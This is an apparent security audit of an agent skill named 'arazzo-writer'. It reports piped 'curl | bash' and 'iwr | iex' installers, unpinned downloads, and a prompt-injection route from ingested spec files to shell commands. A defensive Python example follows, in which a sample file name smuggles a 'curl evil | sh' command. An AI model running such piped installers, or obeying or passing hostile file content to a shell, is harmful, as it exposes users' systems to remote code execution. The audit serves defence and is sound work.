arazzo-writer
Fail
Audited by Gen Agent Trust Hub on Mar 7, 2026
Risk Level: CRITICAL
Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The SKILL.md file directs the agent to execute discovery commands like 'command -v', 'which', and 'where', and to run validation tools ('openapi arazzo validate') as part of its internal reasoning loop.
- [REMOTE_CODE_EXECUTION]: The skill instructs the agent to follow installation guides in the references directory that use piped remote execution patterns such as 'curl | bash' and 'iwr | iex' against go.speakeasy.com. These patterns execute whatever the server (or anyone who can intercept or replace the response) returns, with no pinned version, checksum, or signature checked before the code runs.
- [EXTERNAL_DOWNLOADS]: The skill downloads and installs tools and packages from external registries (NPM, PyPI, and GitHub) for use during the automated validation process; none of these installs are pinned to a version or verified against a known hash.
- [PROMPT_INJECTION]: The skill presents an indirect prompt injection surface: instructions embedded in a file the agent reads can be treated as if they came from the user. Ingestion points: external Arazzo and OpenAPI files processed by the agent. Boundary markers: none identified in the instructions, so file content is not separated from trusted instructions. Capability inventory: execution of shell commands ('openapi', 'python') using data taken from the ingested files. Sanitization: the instructions mention no validation of file paths or file contents before they are passed to those commands, so a path or name chosen by whoever wrote the spec reaches the shell unchecked.
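The following is an added example, not code from the arazzo-writer skill or from the audit. It shows the two mitigations the REMOTE_CODE_EXECUTION and PROMPT_INJECTION findings above call for: save and hash-verify an installer before running it instead of piping it to a shell, and pass a workspace-confined path to 'openapi arazzo validate' as a separate argv element so that a hostile file name cannot inject a second command. The workspace directory, the pinned hash, and the function names ('install_from_download', 'resolve_in_workspace', 'build_validate_command') are assumptions for illustration; the sample installer is a constructed harmless script.

```python
# Added example, not code from the arazzo-writer skill or from the audit.
# Hypothetical names throughout; the installer below is a constructed stand-in.
import hashlib
import subprocess
import tempfile
from pathlib import Path

# Hypothetical agent workspace; a real agent would use its project directory.
WORKSPACE = Path(tempfile.mkdtemp(prefix="arazzo-ws-"))


def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large installers are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def install_from_download(script: Path, expected_sha256: str) -> bool:
    """Replacement for `curl ... | bash` / `iwr ... | iex`.

    The installer is saved to disk first, compared against a hash pinned in
    the skill (obtained out of band, not from the same download), and only
    executed if it matches. Returns True if it ran, False if it was refused.
    """
    if sha256_of(script) != expected_sha256:
        return False
    subprocess.run(["sh", str(script)], check=True, capture_output=True)
    return True


def resolve_in_workspace(user_path: str, root: Path = WORKSPACE) -> Path:
    """Confine a path taken from an ingested file to the workspace.

    resolve() follows symlinks and collapses `..`, so `../etc/passwd`,
    `/etc/passwd` and a symlink pointing outside are all rejected.
    """
    root = root.resolve()
    candidate = (root / user_path).resolve()
    if candidate != root and root not in candidate.parents:
        raise ValueError(f"path escapes workspace: {user_path!r}")
    return candidate


def build_validate_command(user_path: str) -> list[str]:
    """argv for the `openapi arazzo validate` call named in the finding.

    The path is one argv element and no shell is involved, so a file name such
    as `spec.yaml; curl evil | sh` is passed literally to the CLI rather than
    interpreted as two commands.
    """
    return ["openapi", "arazzo", "validate", str(resolve_in_workspace(user_path))]


def validate_arazzo(user_path: str) -> subprocess.CompletedProcess:
    """Run the validator; shell=True is deliberately never used."""
    return subprocess.run(build_validate_command(user_path), capture_output=True, text=True)


if __name__ == "__main__":
    # Constructed stand-in installer: a harmless script used only to exercise the check.
    installer = WORKSPACE / "install.sh"
    installer.write_text("#!/bin/sh\necho installed\n")
    print("good hash ->", install_from_download(installer, sha256_of(installer)))
    print("bad hash  ->", install_from_download(installer, "0" * 64))
    print(build_validate_command("workflows/petstore.arazzo.yaml"))
    try:
        build_validate_command("../../etc/passwd")
    except ValueError as e:
        print("rejected:", e)
```

The hash comparison only helps if the expected value is pinned in the skill itself rather than fetched from the same origin as the script; a signature from a key shipped with the skill is the stronger form of the same idea. Path confinement and argv passing do not stop a spec from carrying instructions aimed at the agent, but they remove the direct route from file content to shell execution that the finding describes.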
Recommendations
- AI detected serious security threats. Before installing this skill on an agent with shell access, replace the piped 'curl | bash' and 'iwr | iex' installers with downloads that are pinned and hash- or signature-verified before execution, pin the NPM, PyPI, and GitHub dependencies, and validate any file path or content taken from an Arazzo or OpenAPI file before it is passed to the 'openapi' or 'python' commands.
Audit Metadata